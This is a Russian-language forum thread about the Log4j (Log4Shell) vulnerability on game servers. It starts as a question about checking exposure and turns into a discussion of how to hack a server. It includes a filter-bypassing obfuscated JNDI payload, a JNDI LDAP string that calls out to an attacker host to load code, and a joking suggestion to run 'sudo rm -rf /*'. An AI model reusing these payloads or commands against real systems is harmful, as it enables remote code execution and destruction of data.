Уязвимость Log4j как узнать что сервер уязвим?

[nilas]

каким образом проверить что могут взломать сервер?
или он не угрожает серверам которая не на вдс/дедик а на хостинг панели?

 

[blackgrandstyle]

каким образом проверить что могут взломать сервер?

Авторизуйтесь для просмотра ссылок.

или он не угрожает серверам которая не на вдс/дедик а на хостинг панели?

Зависит от хостинга. Все нормальные должны были исправить это.

 

[nilas]

Авторизуйтесь для просмотра ссылок.

Зависит от хостинга. Все нормальные должны были исправить это.

Пишут что от ядра сервера тоже зависит.

Авторизуйтесь для просмотра ссылок.

у меня панельный хостинг туда не загрузить эту программу.

 

[Overwrite]

Пишут что от ядра сервера тоже зависит

Если это исправено в ядре - то это исправено в ядре. Если это не исправлено в ядре, то это не исправлено в ядре. Ауф.
В оф.ядрах пейпер всё исправлено на всех версиях.
Самый простой же способ проверить твоё ядро - прописать в консоли say ${date:YYYY}
Выбило дату - ты подвержен

Объединено 29 Июн 2022

Авторизуйтесь для просмотра ссылок.

Интересный факт. На одном панельном хосте есть защита от такого мусора, НО только если ты пишешь ${jndi:***} непосредственно

В то же время ${${env:ENV_NAME:-j}ndi:***}, который имеет тот же самый эффект - спокойно проходит

 

[Кактус]

Интересный факт. На одном панельном хосте есть защита от такого мусора, НО только если ты пишешь ${jndi:***} непосредственно

В то же время ${${env:ENV_NAME:-j}ndi:***}, который имеет тот же самый эффект - спокойно проходит

я еще видел хостинг который не дает возможность создать файл с именем pluginmetrics.jar. неужели нельзя нормально фиксы делать а не просто блокировать ввод жнди?

 

[nilas]

Если это исправено в ядре - то это исправено в ядре. Если это не исправлено в ядре, то это не исправлено в ядре. Ауф.
В оф.ядрах пейпер всё исправлено на всех версиях.
Самый простой же способ проверить твоё ядро - прописать в консоли say ${date:YYYY}
Выбило дату - ты подвержен

Объединено 29 Июн 2022

Интересный факт. На одном панельном хосте есть защита от такого мусора, НО только если ты пишешь ${jndi:***} непосредственно

В то же время ${${env:ENV_NAME:-j}ndi:***}, который имеет тот же самый эффект - спокойно проходит

Ввел,дату выбило но толку? Как запустить тот же sh start.sh чтобы убедиться что сервер защищён?

 

[Overwrite]

Ввел,дату выбило но толку?

Выбило дату - может выполнить код.

Как запустить тот же sh start.sh чтобы убедиться что сервер защищён?

Подробный гайд как пользоваться и репозиторий на гитхабе. Шаришь в жабе - напиши код который тебе выполнит команду sudo rm -rf /*, будет тебе веселуха.

You must be registered for see medias

Авторизуйтесь для просмотра ссылок.

 

[nilas]

Выбило дату - может выполнить код.


Подробный гайд как пользоваться и репозиторий на гитхабе. Шаришь в жабе - напиши код который тебе выполнит команду sudo rm -rf /*, будет тебе веселуха.

You must be registered for see medias

Авторизуйтесь для просмотра ссылок.

Ха-ха - предлагаешь стереть хостинг?

 

[Overwrite]

Ха-ха - предлагаешь стереть free ноду Russiannodes?

У них еще аж одна есть!

 

[nilas]

Выбило дату - может выполнить код.


Подробный гайд как пользоваться и репозиторий на гитхабе. Шаришь в жабе - напиши код который тебе выполнит команду sudo rm -rf /*, будет тебе веселуха.

You must be registered for see medias

Авторизуйтесь для просмотра ссылок.

Так там не показывают как взломать сервер, ток как взломать чужой ПК.

 

[Overwrite]

Так там не показывают как взломать сервер, ток как взломать чужой ПК.

В чем отличие?

 

[nilas]

В чем отличие?

Как минимум порты закрыты т.к панельные хосты дают два рандом порта.
В видео порты открыты т.к все делается в одной внутренней сети.

 

[Overwrite]

Как минимум порты закрыты т.к панельные хосты дают два рандом порта.
В видео порты открыты т.к все делается в одной внутренней сети.

При чем тут порты на твоем компьютере, если код выполняется на утсройстве не зависимо от того открыты ли у него порты? Если по указанному адресу есть класс с кодом который можно выполнить - машина его выполнит.

 

[nilas]

При чем тут порты на твоем компьютере, если код выполняется на утсройстве не зависимо от того открыты ли у него порты? Если по указанному адресу есть класс с кодом который можно выполнить - машина его выполнит.

потому что:${jndi:ldap://10.10.10.10:1389/Log4JCE} зачем вводят на сервере?

 

[Overwrite]

зачем вводят на сервере?

Чтобы сервер обратился по этому IP и порту для выполнения кода Log4JCE

 

[nilas]

Чтобы сервер обратился по этому IP и порту для выполнения кода Log4JCE

ну вот он обращается к компу который хочешь взломать? а мне надо сервер взломать а не чей-то пк

 

[Overwrite]

ну вот он обращается к компу который хочешь взломать?

Лол нет. Он обращается по ТВОЕМУ IP, на котором ты раззмещаешь вредоносный код

 

[Кактус]

ну вот он обращается к компу который хочешь взломать? а мне надо сервер взломать а не чей-то пк

просто уйди с параша нодес и обнови ядро

 

[nilas]

Лол нет. Он обращается по ТВОЕМУ IP, на котором ты раззмещаешь вредоносный код

что то запутанно все, какой вбивать аипи если ты создал серв на хосте а не своем пк?

 

[Overwrite]

какой вбивать аипи если ты создал серв на хосте а не своем пк?

Придется открывать IP на компудахтере, что логично хреновый вариант

Объединено 29 Июн 2022

Придется открывать IP на компудахтере, что логично хреновый вариант

IP бл... порты!